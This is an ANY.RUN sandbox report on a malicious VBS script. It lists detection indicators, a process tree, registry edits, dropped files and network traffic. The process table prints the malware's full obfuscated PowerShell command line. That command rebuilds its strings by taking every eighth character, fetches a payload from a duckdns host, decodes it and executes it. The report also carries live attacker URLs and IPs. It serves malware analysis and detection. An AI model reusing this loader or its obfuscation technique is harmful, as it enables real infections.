File name:

doc-r25-210341852.vbs

Full analysis: https://app.any.run/tasks/2977e060-bc76-4ec5-b38c-f45a7300e898
Verdict: Malicious activity
Analysis date: May 13, 2024, 05:24:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

04F50AF13345EEAC9094B6B6C18B4953

SHA1:

6331B8619D99075E4423A44F0261CE7C8E7A8080

SHA256:

D6BC3148615AD38D2F48D14E405F3F596A14327EBF079A9D76AB6A45D86013B2

SSDEEP:

6144:wZGi6qWuuQ/lCEEsXhXTBkWaUvtyy/hv1q+2dBoFOxVmdaedHNqGOyiSio6xAHIZ:wWOmHIN/FeTvoyI2UTt8Vl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for user acknowledgement. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 3984)
    • Uses sleep, probably for detection evasion (SCRIPT)

      • wscript.exe (PID: 3984)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3984)
    • Reads the Internet Settings

      • wscript.exe (PID: 3984)
      • powershell.exe (PID: 1036)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3984)
      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 3984)
    • Suspicious use of symmetric encryption in PowerShell

      • wscript.exe (PID: 3984)
      • powershell.exe (PID: 1036)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3984)
      • powershell.exe (PID: 1036)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 1036)
    • Block-list domains

      • powershell.exe (PID: 1036)
    • Unusual connection from system programs

      • powershell.exe (PID: 1036)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
    • Application launched itself

      • powershell.exe (PID: 1036)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 1060)
  • INFO

    • Reads the computer name

      • wmpnscfg.exe (PID: 2072)
    • Checks supported languages

      • wmpnscfg.exe (PID: 2072)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2072)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3984)
      • powershell.exe (PID: 1036)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1036)
      • powershell.exe (PID: 1060)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
2
Suspicious processes
1

Behavior graph

Process tree, reconstructed from the graph's order and the parent-process column of the process table below (processes the graph labels "no specs" are marked as such):

explorer.exe
  wscript.exe (PID 3984)
    cmd.exe (PID 4044, no specs)
      ping.exe (PID 4068, no specs)
    powershell.exe (PID 1036)
      cmd.exe (PID 2012, no specs)
      powershell.exe (PID 1060, no specs)
        cmd.exe (PID 2136, no specs)
  wmpnscfg.exe (PID 2072, no specs)

Process information

PID
CMD
Path
Indicators
Parent process
1036"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$regnum = 1;$amphibolies='Su';$amphibolies+='bstrin';$amphibolies+='g';Function Altsaxer($carlis){$Adipocellulose=$carlis.Length-$regnum;For($Menunavnet115=7;$Menunavnet115 -lt $Adipocellulose;$Menunavnet115+=8){$Pseudonitrol+=$carlis.$amphibolies.Invoke( $Menunavnet115, $regnum);}$Pseudonitrol;}function Reklamebureauers($Telpher144){& ($Unreposeful) ($Telpher144);}$Macrocentrinae=Altsaxer 'LastrumM AfbrkkosalgslizEnkemaniPredisol ,fuldelBlackb.aPhotody/ Limnol5 ergild.Overrep0S.osang udside(Bolett WVrel,etiEarsoren,eyboardpilotproVildsomwTarboossAleutic enabletN AfsvkkTanaltti Bombyci1T.ochom0Alloso,.Indicat0Spndetr; Lavt,n PolitiWAutomobiRelabelnCompute6Astrasu4 iervr; Aniser GevinstxIrrepti6Terr.ri4 In.orm;Rmmend, U sasmur Poseykvbiforin:Overten1Paksres2Sacrilu1Biograf.Untr ns0Ski.mia)Memoran Benzin GRepopuleBeboelscCounterkEkskursoAzococ,/Ske.ets2Botryll0Savings1,rhverv0Stayere0Arklngd1tyndp r0Tilgit.1postfi GiddineFGo.anseiH,andsbr Te efoeBlomstefMantramoHeezyhex .alata/Chislse1surreal2 Eyadi,1Chyluri.Kontorp0Ablegat ';$Henaande=Altsaxer ' BaphomU byp rtsBened.ceSugge.erRoilies-Misqua AAvlskergKonkurreAd enocn Ref.rmtHadeful ';$Spermatoplast=Altsaxer 'BlkrenshLegemectSprkkeftdolmerepTypogra:Re.epti/ Delngl/TrichlomEternala.osquitdD.eamsiiArchminbBumm.esa,restsor CollatoForefanhColonsgi.rongfulUmennesaRuskninl Sp.ndla Samment NoachiwStikireo Ras st.duke ugdMorgenduKraniumc Boblepkfr.lggedJobnavnn cry,susFor.lar.Sto,achoKoldtvar Ti,holg Jgerko/Skumpl a HovedplEndoderlDescens/Unretr.EKlamrenl MunkeoeBalmiercSvarbret Sha.osrSundrymoGevandteMobbendn XylogrcHandglaeEkvilibpBrugtprh O,prioaFremme,lModspilobradleygLgeviderModemkoaNondoctpParalephPsykopas Des.rt.DeicticmFren,ubsOver,reoMandige>Pre,erih Rav eatB ckramtNonantipStilfulsSkrekag:Talsyst/B.sterm/BlackfocTorbistaMetalskdmurratreAircoacnLrepladaEndobladplanteueAnraaberOverskueRudelyrg SmillsaZeborasl HagernoFllesfusFoxfire.Sedent 
cLeasingoResupprmTortoni/Ddvgte,EE.ghteelEtymoloeLeeringcLammefrtC,ristarVis,erooEksporte Svedern UskikkcPrekregeSelvvalpSomiklehQueerina Drvtygl Encep oSu.cedagTekketer waterfa DitchdpGalleryhSchweizs,ullhea..ndstnim Mi,jstsAfgnavnoscrea.e ';$Monoftongere=Altsaxer 'Aa sind>Synchyt ';$Unreposeful=Altsaxer 'Sep araiKritisae TrningxSekretr ';$Nooklike='duetoft';Reklamebureauers (Altsaxer 'JernbanSdelkredePouncertAllin.e-.mmobilCTronstoo SurgernFnisedetGobbleseOldstylnIntermit synant lgeatte- TernepPcaddowfaFremelst EgualmhBornhol PenwomeTblander:Lint,li\ Pr,ksiAUdlej.iaDarzee.nBar.lebd Sapi.neWhonerelFravnniyVal,scudAntholoe P,nktssTobaksr1 Inkets1Memory.5 Arc.il.Relatiot Sla texKommenttM,ngelv Bibliom-AbiespyVUrrligtaSicilielThrottlu.rystloeOvere,s Vedrrte$ Sy.polNTaplbeno GlamouoVandledkBagl.splMartyriiportol kDro.seleDelbare;Underle ');Reklamebureauers (Altsaxer 'BloddraiO.phanafBoug,in lndeaa( reseretSkotteheDenuncisSnorkeltk nvert- SkovgapPreshelaA.tologtSaatensh Progra shopke T.undeth:,ypochr\DrukneuAJeersdyaT.lstninW,ttmetdKildeane .undhel ani,aty skovsad HaandfeMarvforsFemerel1Myth.lo1,acisme5Unbrand.An ektztBorni.ixSpadesttVinn,fr).eratin{ SkrmsieWorldwixH,jersmiDerivertAfdelin}Fauciti;Totalfo ');$Citations = Altsaxer ' YderigestylospcPr gramhBitadreoCou,ter Rdg,rdi%CytoplaaEfterslpLiferenpDotagesdTandbe.areine ttHackletaFosterc% Serail\,omomorCUropygiaSourwoosBssebareStaldkalPodotheeFrorenssPorteflsAn,iciplRoughhoysagsa t.Forche.H D ivisoMaltrakvPostnat Arbe,d&Afkri.i& Brikk. TilsnigeFo,trdecForebo,hRumpu eo,elvind Biggene$Praties ';Reklamebureauers (Altsaxer 'Gaperdr$Hel.efygMisderilDise.troHovedm,bSojaoliaSaviourl Kasser: uninciB Aflytno.inicalb Blaasisdrivgaslcoas,gudId,ograeResistlrM.nneson,ndantieLand.wnsArborar=,lerbru(Eaterypc Polyp.mSunroomdOpvejni Genanve/ MetapocCrenot. 
rockcra$persuasCH,elcapi ontrabt LysogeaBevgelst Divi.iiAgurkeso Bor ugnSubdu,msHrgerje) exhila ');Reklamebureauers (Altsaxer 'Rfcpilf$Spec,algSinic.slAulaerno eteropbSuperelaSpargeflfe iemr:vakuumpRdyre rtuPamperedIndi,tidUnderloiVateriaeTykk,mmdCunasfl=Styryli$A,utiloScrookerpAntisiceSemiperrsmocklemAtto,neaChirp,btCa,pereoSalingepMagnetblPseudoia ,oodyss MougeotNederde.PraltrisSmrrebrpCpo,roglBendee.iHymnoditBrawlin( Mangfo$Bokse eMBladkono.etaltrn,ovedvao SquarifabjuncttSsteroro For,adnMr,bareg OrnameeKaliumcrfo,flgeeandrys )Resolu ');$Spermatoplast=$Ruddied[0];Reklamebureauers (Altsaxer 'Koncept$a usiskg Horsepl Fyrp,soG ordbub VesicoaTvangsslMiniste:AgronmeGtonganee ttiremnPassiaroSo,ersapGenkbepffiskerfr FtpsurtOvervlt=RiefstbNAbnor,ieTylarifwUnreven-eksekutOReneagub Fe,ieujKna.dgae RompyccDamefritBerline lysebruS Unimm,yGrubb,dsKbspristSkrivefeUltravimGessoes.IdentifNMa,leeleElenctitSnugger.ildfuglW MejereeP.agalfbCircumgCFregnerl Unauc iB,linspeSkattefnHumani.tPlejnin ');Reklamebureauers (Altsaxer 'Gloomse$GalvanoGSndag seUncolounHoldereoGlyconipkifossifInspicarGrind.htOd.ntog.TzarbasHDe.yelieCowgateaHaftor d .hippeePrisin,rEstamensBromome[Testudi$SaviorsH upstrueBeignetnGyneriuaGe,ebukaPaasejln AerogrdRamadane Dan.eb]Okkerre=Pulsarb$ damspiMCa.ligea DataficElendesrOverfaco gehvidcA.ceptteRhynchonDepe,sotIndflytrJuditepiSurgefunStuearraUdskivneCoff.np ');$Sksporers=Altsaxer 'fuldendGKonjunkeBnfaldenL,detekoComradeprartjomfRegnomrrOpsgesctafprvet.Sta cheD Digts o Bog,ryw Hietsdn ncorrl P,enoxo UsketeaLafgiftd Klag,rFunfrugaiH,lvdrelMandageeOmstyrt(skovpar$.aredteSBaadrutprgs,lereLysinesrUdbredsmrespicea Ingen.t MbelpooBrnehavpStadfaslCylindraUdsaners hkkernt Udgang, Oscill$bifeny.dNyvurdee BaityluUeni,ernSp.jderiGaffeskt TanukiiDy entenInsulsegTubaist)guidosp ';$Sksporers=$Bobsldernes[1]+$Sksporers;$deuniting=$Bobsldernes[0];Reklamebureauers (Altsaxer 'Hy.gega$Meab,efgArbitrrl BremseoVlgerkobKyklopsa.alentflLovfste:LitteraW Lovsa,eRobbinssTidsfe,t 
S.andhhTyp.fic=Nonarte(TerunciTAv skereBrugerdsM.ssagetsetuide-GnaskesPsardiniaF,stiedt LuminahCo osif Stryge$PancreadBegrudge.oreanpuBragsudnUnderbuiSvind,etAnvendeiPiranasnBrevkasg Hircin)Udbytte ');while (!$Westh) {Reklamebureauers (Altsaxer 'Slikkep$Qu,rtergHandel lBe.igtioMainlanb MadeliaMenecralBullet :Und.mniS N.askolSmedelre AflivntAu.eocat Vel,ice .lenistCustomiaGd,ingssContingt AnklageUngettanLandstrsCordell=Herdfor$VerneuktAfblom,rYumcirku Vddem,eAccentu ') ;Reklamebureauers $Sksporers;Reklamebureauers (Altsaxer ' Ari.geSDescendtNonfricaZ nziber powermtPhary g-UdstrkkSsta.dfol Autente uddlereV,dundepPoliti Rerig.r4Hjemmep ');Reklamebureauers (Altsaxer 'Inter n$Bredn.ng ulipanlTacmahaoInco.prbMes.inga T,eskilFll,ser: SynthrWOvermaneVarmthosRitualitKvi.tnihRegdirt= Sulphu(FaestniTFlanrejeBili,yrsGrundlot Tyrend-TorculaPNautheraBefuldmtMuliggrhforedra Fuglebo$ChikanrdCement eKo.ogujuVaude,in Condoli RenaistGeneraliSinecurnMisfilegRetorik) Pieba. ') ;Reklamebureauers (Altsaxer ' B athe$anaplasgclacketlGuds evo MilieubHomb,rgaHypnoselHerezel:,ithawrAEftersttAnslagsrNa,ursi=Skovri $TilridcgRattletlThorsteoFodplejbfasted a Jordell Forecl:SporbreUvillainnSp,dened Durkdre PancharBan,annhGenopreuDecima.sA,todaf+ Propte+ Exi ti%Nonsymb$downcasR wheneeuScrappidSmovsendSpe.unkiTallotteSkattegdSamvret. 
Be olicUndersgoUnconcouUndskylnSepha,dtaalholm ') ;$Spermatoplast=$Ruddied[$Atr];}$Refunders=324737;$Nex=30782;Reklamebureauers (Altsaxer ' Sideli$SavinesgradilytlFirdobloUnforfebDisp sea,onteril.tvlend: SubstaOUnbegilvMonandreRea.owercapel nfUnassimaDhoulpot SildefnAdventueSagaerls coalbissentent Pericli=D.ursla Centil,GCytopateVonprittIncrepa-HuldskaCBurthenoHviltj,nFletkomtsukkerkeAutosomnSdekorntRullest Publick$Radi,ssdoutsette AerobauNoctivanForlbepiZoo eoltBruisesiFigurern Gal,afgSh,kspe ');Reklamebureauers (Altsaxer 'Udstill$LsgresfgPerriesl phren.oRe pittb M.ttenaP ychosl .gnkio:Orke,esHProdisaepalaemorSuperf mDelik te Feminil B.conii,taalignGataffesTolvta kAnsg,efaSp,ndelaMiminypbLilianseFestugerModellenMurrendeEksamen Produkt= Besudl Snylted[MongrelSspndingyForhandsDillenitLadyisheCop cetmgennemt.ForlagsCUle,asmo EklipsnelektrovKartoteeReanalyrSubattetBautast]Lemfldi: Enanti:AfskaarFDistribrExo,heco JakkermVejrmelBTronbesaOutblowsGenerate.ldprve6.aroese4KvindehSTrigonotCarangir Ing,bui Rusk.in StninggBulderk(Antip i$TorinotOTrekantvSnoreaseArmbevgrTaxametf.ilobytaInaltert Volca n MongoleEpical sForudinsTheft e)Gasmask ');Reklamebureauers (Altsaxer 'Hymnbo.$JvnedeegOdellnolAutentioTerminabS riktuaFilm onlAfslutn:CrescivIS indlen OptoblsPerlineuUnder nlKonsekvaMorul.srFordredi Centrat utkitcylnudvik Narbon=M,rcuri Teodor[TumlessS .oldray Skr,brs aretict yrenoe sidemam T lkbs.VoldbysTChe.seae NeoterxMultipatKlvacon.Recom,eE echinonGnubbencMostretoSoldyrkdRationai Kronebn QuipoxgVaginof] ,oveds:Foruren:RealienARessourSTailbanCLivvagtItryllekIEvoluti.HofdessGHavregre MetalltAlcogelSNedbri,tTeok.atrAcroartiLuminesnPinhookgSandsyn( tvrfor$BegivenHDadelfreLnudgifrBiarticm Cavdiae KastanlThermo,iTomahawnPollinisPreparikEletaseaSatel.ea FairyibSavsk.eeLangaabr FingernKampesteOver,kk)Pyrroph ');Reklamebureauers (Altsaxer 'Arrogan$In rovog aporislbodsvanoTrickopbForanalaHvedsmalRadiosh:questinP Phi.ogrByldersoHypoth.jCha.gefesiddembk Radioet 
nhoodeeOutstrirYndlingsSubnetw=Bangebu$BlecideIResolvenProgramsnonmammuVsen,lilBruttofaResonanr artyiiSledge,tDisposiy Confer.Tetrag.sSillyisuFeastinbphrasinsUdlevedt HalvdarSkygniniirritatnLodsejegAfsvali(minkkr $Kana.cjRS rtankeEngl.skfFingerpuTonsilenLuksu.jd.eltideeSeasonsrP.radigsOverest,Surroun$FirehndN Intr neA tvrdixHy.ropr)Akupunk ');Reklamebureauers $Projekters;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1060
CMD: identical to the obfuscated PowerShell command line of PID 1036 above
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2012
CMD: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Caselessly.Hov && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2072
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 2136
CMD: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Caselessly.Hov && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 3984
CMD: "C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\doc-r25-210341852.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 4044
CMD: cmd.exe /c ping 6777.6777.6777.677e
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 4068
CMD: ping 6777.6777.6777.677e
Path: C:\Windows\System32\PING.EXE
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
Total events
10 617
Read events
10 577
Write events
28
Delete events
12

Modification events

(PID) Process: (3984) wscript.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3984) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
Operation: delete value
Name: 9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Value:

(PID) Process: (3984) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: write
Name: Blob
Value:
(PID) Process: (3984) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: delete value
Name: File
Value:

(PID) Process: (3984) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: delete key
Name: (default)
Value:

(PID) Process: (3984) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: write
Name: Blob
Value:
(PID) Process: (3984) wscript.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\9F6134C5FA75E4FDDE631B232BE961D6D4B97DB6
Operation: write
Name: Blob
Value:
(PID) Process: (3984) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (3984) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (3984) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1
Executable files
0
Suspicious files
9
Text files
1
Unknown types
0

Dropped files

PID: 3984
Process: wscript.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Type: compressed
MD5: 29F65BA8E88C063813CC50A4EA544E93
SHA256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184

PID: 1036
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\eumo40bq.3sg.psm1
Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 1060
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\qn3b4odh.maf.ps1
Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 1036
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Caselessly.Hov
Type: text
MD5: E9C18D978961144D4B45B3DA857B6942
SHA256: 466242AE14ADE651AA0D8296EC3088290A987A18634CEEFF220AFEB3F52A65B0

PID: 1060
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\npiyquju.k4j.psm1
Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 1036
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\dsi2f1ox.kyl.ps1
Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 3984
Process: wscript.exe
Filename: C:\Users\admin\AppData\Local\Temp\Tar3B47.tmp
Type: binary
MD5: 435A9AC180383F9FA094131B173A2F7B
SHA256: 67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34

PID: 3984
Process: wscript.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Type: binary
MD5: D34F5C146C542EDC37F991FF7F0D10D1
SHA256: 1942BB42CCAD165BB012BCE7925EF102B699917F09E5611E285492E7FF3932DC

PID: 3984
Process: wscript.exe
Filename: C:\Users\admin\AppData\Local\Temp\Cab3B46.tmp
Type: compressed
MD5: 29F65BA8E88C063813CC50A4EA544E93
SHA256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184

PID: 1036
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Type: binary
MD5: 6675EDE59684F4A119D2E5DA282AFBE6
SHA256: 5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
3
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3984
wscript.exe
GET
200
2.23.154.144:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5c99d8d69b8c3556
unknown
unknown
1036
powershell.exe
GET
200
84.247.187.12:80
http://madibarohilalatwo.duckdns.org/all/Electroencephalographs.mso
unknown
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
3984
wscript.exe
2.23.154.144:80
ctldl.windowsupdate.com
Akamai International B.V.
AT
unknown
1088
svchost.exe
224.0.0.252:5355
unknown
1036
powershell.exe
84.247.187.12:80
madibarohilalatwo.duckdns.org
BRDY AS
NO
unknown

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 2.23.154.144
whitelisted
6777.6777.6777.677e
  • 49.13.77.253
unknown
madibarohilalatwo.duckdns.org
  • 84.247.187.12
unknown

Threats

PID
Process
Class
Message
1088
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
1088
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1036
powershell.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain
No debug info